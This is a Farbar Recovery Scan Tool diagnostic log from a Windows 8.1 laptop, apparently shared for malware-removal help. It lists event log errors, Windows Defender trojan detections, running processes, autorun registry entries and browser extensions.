Pre-Junkware Removal ==================== Faulty Device Manager Devices ============= Name: Description: Class Guid: Manufacturer: Service: Problem: : The drivers for this device are not installed. (Code 28) Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard. ==================== Event log errors: ========================= Application errors: ================== Error: (02/17/2019 12:43:31 PM) (Source: Application Hang) (EventID: 1002) (User: ) Description: The program FRST64.exe version 13.2.2019.1 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel. Process ID: 1cb8 Start Time: 01d4c6b5f947de37 Termination Time: 30 Application Path: C:\Users\Stanley\Downloads\FRST\FRST64.exe Report Id: 3b0a8a57-32a9-11e9-8280-402cf4d8539a Faulting package full name: Faulting package-relative application ID: Error: (02/17/2019 09:05:42 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: ) Description: License Activation (slui.exe) failed with the following error code: hr=0x8007007B Command-line arguments: RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=81671aaf-79d1-4eb1-b004-8cbbe173afea;NotificationInterval=1440;Trigger=NetworkAvailable Error: (02/17/2019 09:05:37 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: ) Description: License Activation (slui.exe) failed with the following error code: hr=0x8007007B Command-line arguments: RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=81671aaf-79d1-4eb1-b004-8cbbe173afea;NotificationInterval=1440;Trigger=NetworkAvailable Error: (02/17/2019 09:05:05 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: ) Description: License Activation (slui.exe) failed with the following error code: hr=0x8007007B Command-line arguments: RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=81671aaf-79d1-4eb1-b004-8cbbe173afea;NotificationInterval=1440;Trigger=NetworkAvailable Error: (02/17/2019 01:04:23 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: ) Description: License Activation (slui.exe) failed with the following error code: hr=0x8007007B Command-line arguments: RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=81671aaf-79d1-4eb1-b004-8cbbe173afea;NotificationInterval=1440;Trigger=NetworkAvailable Error: (02/16/2019 09:48:51 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: ) Description: License Activation (slui.exe) failed with the following error code: hr=0x8007007B Command-line arguments: RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=81671aaf-79d1-4eb1-b004-8cbbe173afea;NotificationInterval=1440;Trigger=NetworkAvailable Error: (02/16/2019 08:55:56 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: ) Description: License Activation (slui.exe) failed with the following error code: hr=0x8007007B Command-line arguments: RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=81671aaf-79d1-4eb1-b004-8cbbe173afea;NotificationInterval=1440;Trigger=NetworkAvailable Error: (02/16/2019 08:36:40 PM) (Source: Software Protection Platform Service) (EventID: 8198) (User: ) Description: License Activation (slui.exe) failed with the following error code: hr=0x8007007B Command-line arguments: RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=81671aaf-79d1-4eb1-b004-8cbbe173afea;NotificationInterval=1440;Trigger=NetworkAvailable System errors: ============= Error: (02/16/2019 09:01:30 AM) (Source: Service Control Manager) (EventID: 7022) (User: ) Description: The Iskysoft Application Framework Service service hung on starting. Error: (02/16/2019 09:00:39 AM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: The OpenVPN Legacy Service service terminated with the following error: The process cannot access the file because it is being used by another process. Error: (02/16/2019 09:00:37 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: The UC Browser Service service failed to start due to the following error: The system cannot find the file specified. Error: (02/16/2019 08:33:34 AM) (Source: Service Control Manager) (EventID: 7022) (User: ) Description: The Iskysoft Application Framework Service service hung on starting. Error: (02/16/2019 08:32:43 AM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: The OpenVPN Legacy Service service terminated with the following error: The process cannot access the file because it is being used by another process. Error: (02/16/2019 08:32:42 AM) (Source: Service Control Manager) (EventID: 7000) (User: ) Description: The UC Browser Service service failed to start due to the following error: The system cannot find the file specified. Error: (02/16/2019 07:38:07 AM) (Source: Service Control Manager) (EventID: 7022) (User: ) Description: The Iskysoft Application Framework Service service hung on starting. Error: (02/16/2019 07:37:13 AM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: The OpenVPN Legacy Service service terminated with the following error: The process cannot access the file because it is being used by another process. Windows Defender: =================================== Date: 2019-02-15 01:30:44.644 Description: Windows Defender scan has been stopped before completion. Scan ID: {33A0CEFD-234D-475F-8ADE-5D3D11D9E85A} Scan Type: Antimalware Scan Parameters: Full Scan Date: 2019-02-14 03:37:29.427 Description: Windows Defender scan has been stopped before completion. Scan ID: {37ABE826-5D4C-4627-8D24-955304B7A07C} Scan Type: Antimalware Scan Parameters: Quick Scan Date: 2019-02-13 23:30:12.489 Description: Windows Defender has detected malware or other potentially unwanted software. For more information please see the following: http://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Fuerboos.C!cl&threatid=2147723654&enterprise=0 Name: Trojan:Win32/Fuerboos.C!cl ID: 2147723654 Severity: Severe Category: Trojan Path: file:_C:\Users\Stanley\AppData\Local\Dingbam.tst Detection Origin: Local machine Detection Type: FastPath Detection Source: User Process Name: Unknown Signature Version: AV: 1.285.1510.0, AS: 1.285.1510.0, NIS: 0.0.0.0 Engine Version: AM: 1.1.15600.4, NIS: 0.0.0.0 Date: 2019-02-13 23:30:12.489 Description: Windows Defender has detected malware or other potentially unwanted software. For more information please see the following: http://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Bitrep.A&threatid=2147723097&enterprise=0 Name: Trojan:Win32/Bitrep.A ID: 2147723097 Severity: Severe Category: Trojan Path: file:_C:\Users\Stanley\AppData\Local\IM\Identities\{A156883C-4811-474F-ACCE-796599B8B822}\Message Store\Messages\4\{E94F6B5A-2129-4595-A27B-FBAABD7D5EE2}\Attachments\Order_009.pdf Detection Origin: Local machine Detection Type: FastPath Detection Source: User Process Name: Unknown Signature Version: AV: 1.285.1510.0, AS: 1.285.1510.0, NIS: 0.0.0.0 Engine Version: AM: 1.1.15600.4, NIS: 0.0.0.0 Date: 2019-02-13 23:30:12.489 Description: Windows Defender has detected malware or other potentially unwanted software. For more information please see the following: http://go.microsoft.com/fwlink/?linkid=37020&name=SoftwareBundler:Win32/Prepscram&threatid=226289&enterprise=0 Name: SoftwareBundler:Win32/Prepscram ID: 226289 Severity: High Category: Software Bundler Path: containerfile:_C:\Users\Stanley\Downloads\Programs\BG-HUNTING SERBIA.txt;file:_C:\Users\Stanley\Downloads\Programs\BG-HUNTING SERBIA.txt->setup.exe Detection Origin: Local machine Detection Type: Concrete Detection Source: User Process Name: Unknown Signature Version: AV: 1.285.1510.0, AS: 1.285.1510.0, NIS: 0.0.0.0 Engine Version: AM: 1.1.15600.4, NIS: 0.0.0.0 Date: 2019-02-13 16:10:19.791 Description: Windows Defender has encountered an error trying to update signatures. New Signature Version: Previous Signature Version: 1.269.584.0 Update Source: Microsoft Update Server Signature Type: AntiVirus Update Type: Full Current Engine Version: Previous Engine Version: 1.1.14901.4 Error code: 0x80070424 Error description: The specified service does not exist as an installed service. Date: 2019-02-13 16:02:00.333 Description: Windows Defender has encountered an error trying to update signatures. New Signature Version: Previous Signature Version: 1.269.584.0 Update Source: Microsoft Malware Protection Center Signature Type: AntiSpyware Update Type: Full Current Engine Version: Previous Engine Version: 1.1.14901.4 Error code: 0x80072ee2 Error description: The operation timed out Date: 2019-02-13 16:02:00.333 Description: Windows Defender has encountered an error trying to update signatures. New Signature Version: Previous Signature Version: 1.269.584.0 Update Source: Microsoft Malware Protection Center Signature Type: AntiVirus Update Type: Full Current Engine Version: Previous Engine Version: 1.1.14901.4 Error code: 0x80072ee2 Error description: The operation timed out Date: 2019-02-13 15:59:52.285 Description: Windows Defender has encountered an error trying to update signatures. New Signature Version: Previous Signature Version: 1.269.584.0 Update Source: Microsoft Update Server Signature Type: AntiVirus Update Type: Full Current Engine Version: Previous Engine Version: 1.1.14901.4 Error code: 0x80070424 Error description: The specified service does not exist as an installed service. Date: 2018-05-29 09:02:21.940 Description: Windows Defender has encountered a critical error when taking action on malware or other potentially unwanted software. For more information please see the following: http://go.microsoft.com/fwlink/?linkid=37020&name=PWS:Win32/Dyzap.X&threatid=2147717189&enterprise=0 Name: PWS:Win32/Dyzap.X ID: 2147717189 Severity: Severe Category: Password Stealer Path: process:_pid:5952,ProcessStart:131720254146746317 Detection Origin: Unknown Detection Type: Concrete Detection Source: System Process Name: C:\Users\Stanley\AppData\Local\Temp\~AceTemp\APPROVED_DOCUMENTS_2018_PDF\APPROVED DOCUMENTS 2018_PDF.exe Action: Quarantine Action Status: To finish removing malware and other potentially unwanted software, you need to run a full scan. For information about scanning options, see Help and Support. To finish removing malware and other potentially unwanted software, restart the computer. Error Code: 0x8007054f Error description: An internal error occurred. Signature Version: AV: 1.267.1085.0, AS: 1.267.1085.0, NIS: 0.0.0.0 Engine Version: AM: 1.1.14800.3, NIS: 0.0.0.0 CodeIntegrity: =================================== Date: 2018-12-23 07:19:51.102 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\wsadb.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2018-12-23 07:19:49.365 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\wsadb.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2018-12-23 07:19:47.582 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\wsadb.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2018-12-23 07:19:45.686 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\wsadb.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. ==================== Memory info =========================== Processor: Intel(R) Core(TM) i5-2540M CPU @ 2.60GHz Percentage of memory in use: 47% Total physical RAM: 4006.35 MB Available physical RAM: 2102.2 MB Total Virtual: 7974.35 MB Available Virtual: 5486.83 MB ==================== Drives ================================ Drive 😄 () (Fixed) (Total:297.75 GB) (Free:65.57 GB) NTFS \\?\Volume{4756afb4-4eee-11e8-824f-806e6f6e6963}\ (System Reserved) (Fixed) (Total:0.34 GB) (Free:0.09 GB) NTFS ==================== MBR & Partition Table ================== ======================================================== Disk: 0 (MBR Code: Windows 7/8/10) (Size: 298.1 GB) (Disk ID: 2DDE751F) Partition 1: (Active) - (Size=350 MB) - (Type=07 NTFS) Partition 2: (Not Active) - (Size=297.7 GB) - (Type=07 NTFS) ==================== End of Addition.txt ============================
  7. FRST.TXT Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 13.02.2019 Ran by #Strazzo.RoseGold## (administrator) on STRAZZOWEEZY (17-02-2019 12:44:19) Running from C:\Users\Stanley\Downloads\FRST Loaded Profiles: #Strazzo.RoseGold## (Available Profiles: #Strazzo.RoseGold## & RoseGold & Administrator) Platform: Windows 8.1 Enterprise (Update) (X64) Language: English (United States) Default browser: IE Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (Hewlett-Packard Company) C:\Windows\System32\hpservice.exe (LSI Corporation) C:\Program Files\LSI SoftModem\agr64svc.exe (Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe (Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe (Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\HPDrvMntSvc.exe (Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Hotkey Support\HPHotkeyMonitor.exe (HP Inc.) C:\Program Files (x86)\HP\HP System Event\HPWMISVC.exe (Iskysoft) C:\Program Files (x86)\iSkysoft\IAF\2.4.2.223\IsAppService.exe (Microsoft Corporation) C:\Program Files (x86)\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE ( ) C:\Program Files\OpenVPN\bin\openvpnserv2.exe (The OpenVPN Project) C:\Program Files\OpenVPN\bin\openvpnserv.exe (The OpenVPN Project) C:\Program Files\OpenVPN\bin\openvpn.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Research In Motion\Tunnel Manager\mDNSResponder.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe (BlackBerry Limited) C:\Program Files (x86)\Common Files\Research In Motion\Tunnel Manager\tunmgr.exe (The OpenVPN Project) C:\Program Files\OpenVPN\bin\openvpn.exe (The OpenVPN Project) C:\Program Files\OpenVPN\bin\openvpn.exe (Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe (BlackBerry Limited) C:\Program Files (x86)\Common Files\Research In Motion\USB Drivers\BbDevMgr.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe (Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe (Microsoft Corporation) C:\Windows\System32\dllhost.exe (Intel Corporation) C:\Windows\System32\igfxtray.exe (Intel Corporation) C:\Windows\System32\hkcmd.exe (Intel Corporation) C:\Windows\System32\igfxpers.exe (Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe (Skype Technologies S.A.) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (BitTorrent Inc.) C:\Users\Stanley\AppData\Roaming\uTorrent\uTorrent.exe (Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IDMan.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudDrive.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe (Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudPhotos.exe (Microsoft Corporation) C:\Windows\System32\StikyNot.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (BitTorrent Inc.) C:\Users\Stanley\AppData\Roaming\uTorrent\updates\3.5.5_44994\utorrentie.exe (Apple, Inc.) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\secd.exe (BitTorrent Inc.) C:\Users\Stanley\AppData\Roaming\uTorrent\updates\3.5.5_44994\utorrentie.exe (Tonec Inc.) C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe (Skype Technologies S.A.) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Technologies S.A.) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Technologies S.A.) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.23\GoogleCrashHandler.exe (Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.23\GoogleCrashHandler64.exe (HP Inc.) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe (Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16.0.3327.1048_x64__8wekyb3d8bbwe\onenoteim.exe (Microsoft Corporation) C:\Windows\System32\UserAccountBroker.exe (Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe (Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe (VideoLAN) C:\Program Files\VideoLAN\VLC\vlc.exe (Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\AppleIEDAV.exe (Microsoft Corporation) C:\Windows\System32\prevhost.exe ==================== Registry (Whitelisted) =========================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [302904 2019-01-18] (Apple Inc. -> Apple Inc.) HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [Skype for Desktop] => C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe [53540200 2019-02-08] (Skype Software Sarl -> Skype Technologies S.A.) HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [OPENVPN-GUI] => C:\Program Files\OpenVPN\bin\openvpn-gui.exe [672384 2018-04-26] (OpenVPN Technologies, Inc. -> ) HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [uTorrent] => C:\Users\Stanley\AppData\Roaming\uTorrent\uTorrent.exe [1908920 2019-01-17] (BitTorrent Inc -> BitTorrent Inc.) HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [IDMan] => C:\Program Files (x86)\Internet Download Manager\IDMan.exe [3907152 2015-07-07] (Tonec Inc. -> Tonec Inc.) HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [RIMDeviceManager] => C:\Program Files (x86)\Common Files\Research In Motion\RIMDeviceManager\RIMDeviceManager.exe [2471672 2015-05-20] (BlackBerry Ltd. -> Research In Motion Limited) HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [iCloudServices] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe [67384 2018-12-03] (Apple Inc. -> Apple Inc.) HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [AppleIEDAV] => C:\Program Files (x86)\Common Files\Apple\Internet Services\AppleIEDAV.exe [68408 2018-12-03] (Apple Inc. -> Apple Inc.) HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [iCloudDrive] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudDrive.exe [110392 2018-12-03] (Apple Inc. -> Apple Inc.) HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [ApplePhotoStreams] => C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe [67896 2019-01-15] (Apple Inc. -> Apple Inc.) HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [iCloudPhotos] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudPhotos.exe [356664 2018-12-03] (Apple Inc. -> Apple Inc.) HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Run: [RESTART_STICKY_NOTES] => C:\Windows\System32\StikyNot.exe [479744 2014-11-22] (Microsoft Windows -> Microsoft Corporation) HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\MountPoints2: {2c5e9d22-76c0-11e8-825e-402cf4d8539a} - "C:\Windows\system32\RunDLL32.EXE" Shell32.DLL,ShellExec_RunDLL E:\start.exe HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\MountPoints2: {82ed0bf7-c8c3-11e8-8261-402cf4d8539a} - "E:\AutoRun.exe" HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\MountPoints2: {82ed0c50-c8c3-11e8-8261-402cf4d8539a} - "E:\AutoRun.exe" HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\MountPoints2: {82ed0d35-c8c3-11e8-8261-402cf4d8539a} - "E:\AutoRun.exe" HKU\S-1-5-18\...\Policies\Explorer: [LinkResolveIgnoreLinkInfo] 1 HKU\S-1-5-18\...\Policies\Explorer: [NoResolveSearch] 1 HKU\S-1-5-18\...\Policies\Explorer: [NoInternetOpenWith] 1 HKLM\...\Drivers32-x32: [msacm.iac2] => C:\Windows\SysWOW64\iac25_32.ax [197632 2013-08-22] (Intel Corporation) HKLM\...\Drivers32-x32: [VIDC.GEOS] => C:\Windows\SysWOW64\GeoCodecD.dll [622592 2010-10-11] (GeoVision) HKLM\Software\Microsoft\Active Setup\Installed Components: [OpenVPN_UserSetup] -> reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OPENVPN-GUI /t REG_SZ /d "C:\Program Files\OpenVPN\bin\openvpn-gui.exe" /f HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\72.0.3626.109\Installer\chrmstp.exe [2019-02-15] (Google LLC -> Google Inc.) HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{65122CB0-EA0F-47DF-A953-017170ED12F9}] -> "C:\Program Files (x86)\UCBrowser\Application\7.0.185.1002\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --wow-install-target-path="C:\Program Files (x86)\UCBrowser" HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{73FA19D0-2D75-11D2-995D-00C04F98BBC9}] -> GroupPolicy: Restriction ? <==== ATTENTION ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt Tcpip\Parameters: [DhcpNameServer] 192.168.8.1 Tcpip\..\Interfaces\{25D62E88-57F7-4879-91B3-0FBE5C8B4F71}: [DhcpNameServer] 1.1.1.1 1.0.0.1 Tcpip\..\Interfaces\{8BF038DF-16AA-4203-90BE-740E3461F3D4}: [DhcpNameServer] 192.168.8.1 Tcpip\..\Interfaces\{D14C4B82-5B48-498C-8F6E-81ADA12C1C8C}: [DhcpNameServer] 172.20.10.1 Tcpip\..\Interfaces\{D433F076-2F7D-4301-BE73-E8CE381871C0}: [DhcpNameServer] 192.168.8.1 Internet Explorer: ================== HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/?ocid=iehp SearchScopes: HKLM-x32 -> DefaultScope value is missing BHO: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC64.dll [2015-07-08] (Tonec Inc. -> Internet Download Manager, Tonec Inc.) BHO-x32: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC.dll [2015-07-08] (Tonec Inc. -> Internet Download Manager, Tonec Inc.) IE Session Restore: HKU\S-1-5-21-1692593245-3285590566-2148222763-1001 -> is enabled. FireFox: ======== FF ProfilePath: C:\Users\Stanley\AppData\Roaming\Mozilla\Firefox\Profiles\nahd6ha2.default [2019-02-15] FF Extension: (Google Code Correction) - C:\Users\Stanley\AppData\Roaming\Mozilla\Firefox\Profiles\nahd6ha2.default\features\{5b8c6255-56bd-4974-a055-17773a870acc}\google-code-correction@mozilla.org.xpi [2018-05-21] [Legacy] FF HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\Firefox\Extensions: [mozilla_cc2@internetdownloadmanager.com] - C:\Users\Stanley\AppData\Roaming\IDM\idmmzcc7 FF Extension: (IDM integration) - C:\Users\Stanley\AppData\Roaming\IDM\idmmzcc7 [2018-09-23] [Legacy] [not signed] FF HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\Stanley\AppData\Roaming\IDM\idmmzcc5 FF Extension: (IDM CC) - C:\Users\Stanley\AppData\Roaming\IDM\idmmzcc5 [2019-02-16] [Legacy] [not signed] FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_20_0_0_286.dll [2016-01-19] () FF Plugin: @videolan.org/vlc,version=3.0.3 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN) FF Plugin: @videolan.org/vlc,version=3.0.4 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN) FF Plugin: @videolan.org/vlc,version=3.0.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-01-10] (VideoLAN) FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_286.dll [2016-01-19] () FF Plugin-x32: @RIM.com/WebSLLauncher,version=1.0 -> C:\Program Files (x86)\Common Files\Research In Motion\BBWebSLLauncher\NPWebSLLauncher.dll [2015-05-22] () FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2018-12-17] (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.23\npGoogleUpdate3.dll [2018-12-17] (Google Inc.) Chrome: ======= CHR DefaultProfile: Profile 3 CHR Session Restore: Profile 3 -> is enabled. CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default [2019-02-15] CHR Extension: (chrome_filter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\iaoamimahmkdnfhcooffilicogppjebo [2019-02-08] CHR Extension: (Email Hunter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\igpjommeafjpifagkfhebdbofcokbhcb [2018-06-15] CHR Extension: (IDM Integration Module) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2018-11-08] CHR Extension: (Chrome Web Store Payments) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-06-12] CHR Extension: (Chrome Media Router) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Backup Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2018-11-08] CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default [2019-02-17] CHR Extension: (Slides) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2019-02-15] CHR Extension: (Docs) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2019-02-15] CHR Extension: (Google Drive) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2019-02-15] CHR Extension: (YouTube) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2019-02-15] CHR Extension: (Sheets) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2019-02-15] CHR Extension: (Google Docs Offline) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2019-02-16] CHR Extension: (Chrome Web Store Payments) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-02-15] CHR Extension: (Gmail) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-02-15] CHR Extension: (Chrome Media Router) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-02-15] CHR Profile: C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1 [2019-02-17] CHR Extension: (Slides) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-05-04] CHR Extension: (Docs) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2018-05-04] CHR Extension: (Google Drive) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-10-23] CHR Extension: (YouTube) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-05-04] CHR Extension: (Sheets) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-05-04] CHR Extension: (Google Docs Offline) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-08-26] CHR Extension: (Email Hunter) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\igpjommeafjpifagkfhebdbofcokbhcb [2019-01-10] CHR Extension: (IDM Integration Module) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ngpampappnmepgilojfohadhhmbhlaek [2019-02-16] CHR Extension: (Chrome Web Store Payments) - C:\Users\Stanley\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2018-05-04] CHR Extension: 